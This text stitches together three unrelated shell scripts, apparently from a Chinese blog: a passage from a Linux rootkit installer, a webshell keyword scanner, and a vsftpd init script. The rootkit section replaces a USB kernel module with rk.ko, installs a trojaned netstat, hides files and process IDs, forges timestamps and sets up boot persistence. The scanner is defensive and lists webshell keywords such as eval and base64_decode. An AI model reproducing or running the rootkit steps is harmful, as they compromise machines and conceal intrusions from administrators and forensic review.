touch -amcr /bin/ls /etc/inittab

 

###########make sure inittab has modified##########

 

if [ ! "`grep ttyload /etc/inittab`" ]; then

   echo "# WARNING - SSHD WONT BE RELOADED UPON RESTART "

   echo "# inittab shuffling probly fucked-up ! "

fi

 

##########load rk.ko##########

cd $BASEDIR

modprobe -r ehci-hcd

mv -f rk.ko /lib/modules/`uname -r`/kernel/drivers/usb/host/ehci-hcd.ko

modprobe ehci-hcd

mv tty $HOMEDIR

 

##########replace netstat##########

touch -acmr /bin/netstat netstat

mv -f netstat /bin/netstat

 

##########hide all files and process##########

$HOMEDIR/tty h /etc/sh.conf > /dev/null 2>&1

$HOMEDIR/tty h /lib/libsh.so > /dev/null 2>&1

$HOMEDIR/tty h /usr/lib/libsh > /dev/null 2>&1

$HOMEDIR/tty h /sbin/ttyload > /dev/null 2>&1

$HOMEDIR/tty h /usr/sbin/ttyload > /dev/null 2>&1

$HOMEDIR/tty h /sbin/ttymon > /dev/null 2>&1

$HOMEDIR/tty i `pidof ttyload` > /dev/null 2>&1

$HOMEDIR/tty i `pidof ttymon` > /dev/null 2>&1

 

##########load rk.ko on boot##########

cat > /etc/sysconfig/modules/ehci.modules << EOF

#!/bin/sh

#install usb modules support

modprobe -r ehci-hcd

modprobe ehci-hcd

EOF

touch -amcr /bin/ls /etc/sysconfig/modules/ehci.modules

 

chmod 755 /etc/sysconfig/modules/ehci.modules

$HOMEDIR/tty h /etc/sysconfig/modules/ehci.modules > /dev/null 2>&1

 

##########check iptables setting##########

if [ -f /sbin/iptables ]; then

   echo "`/sbin/iptables -L INPUT | head -5`"

else

   echo ""

   echo "# lucky for u no iptables found"

fi

 

##########start syslogd##########

/sbin/syslogd -m 0

 

# ./setup 123 3333    //设

#!/bin/bash

#scan webshell shell

dire=/data//                    #   web path

exname=.php                 #   .php; .jsp; .php3

key=eval                        #   system; exec; base64_decode

page=$(find PATH -name "*.php" -type f )                                      #这样效率会更高,修改用find

#page=$(du -a $dire|awk '{print $2}'|grep $exname)

for i in $page

do

test=$(cat $i |grep -i $key)

if [ ! -z "$test" ]

then

echo $i >> tmp              #

fi

done

 

网站被黑后,如果网站动态页面,很难一一搜索,通过搜索webshell 里面常用的关键词,来节省一段时间。

实现方法很简单,思路就是这样。

遍历整个目录下的文件,搜索特出关键词(webshell里面的敏感关键词),然后重定向到一个文件。在检查这些文件,就快的多了。

 

 

 

#!/bin/bash

#by:key1088

#description:vsftpd

#conf:/etc/vsftpd/vsftp.conf

#cp vsftpd  /etc/init.d/vsftpd

#chmod 755 /etc/init.d/vsftpd

#chkconfig --add vsftpd 

#chkconfig vsftpd on

 

 

if [ -f /etc/init.d/functions ] 

then

. /etc/init.d/functions

elif [ -f /etc/rc.d/init.d/functions ]

then

. /etc/rc.d/init.d/functions

else

exit 0

fi

vsftpd=/usr/local/sbin/vsftpd      

ftpconf=/etc/vsftpd/vsftpd.conf

prog=vsftpd

RETVAL=0

start() {

        if [ -n "`/sbin/pidof $prog`" ]

        then

                echo "$prog: already running"       

                return 1

        fi

        echo "Starting $prog:"

        base=$prog

        $vsftpd $ftpconf&

        if [ -z "`/sbin/pidof $prog`" ]

        then

                RETVAL=1

        fi

        if [ $RETVAL -ne 0 ]       

        then

        echo "Startup failure" 

        else

        echo "Startup success"  

        fi

        return $RETVAL

}

 

stop() {

if [ -z "`/sbin/pidof $prog`" ]

then

RETVAL=1

fi

if [ $RETVAL -ne 0 ]

then

echo "vsftpd no have run"

else

        echo "Stopping $prog:"

        killall $vsftpd

        RETVAL=$?

        if [ $RETVAL -ne 0 ]

        then

        echo "Shutdown failure"   

        else

        echo "Shutdown success"     

        fi

fi

}

 

case "$1" in

start)

        start    

        ;;

stop)

        stop   

        ;;

status)

        status $vsftpd

        RETVAL=$?    

        ;;

restart)

        stop

        start

        ;;

*)

        echo "Usage: $prog {start|stop|restart|status}"

        exit 1

esac

exit $RETVAL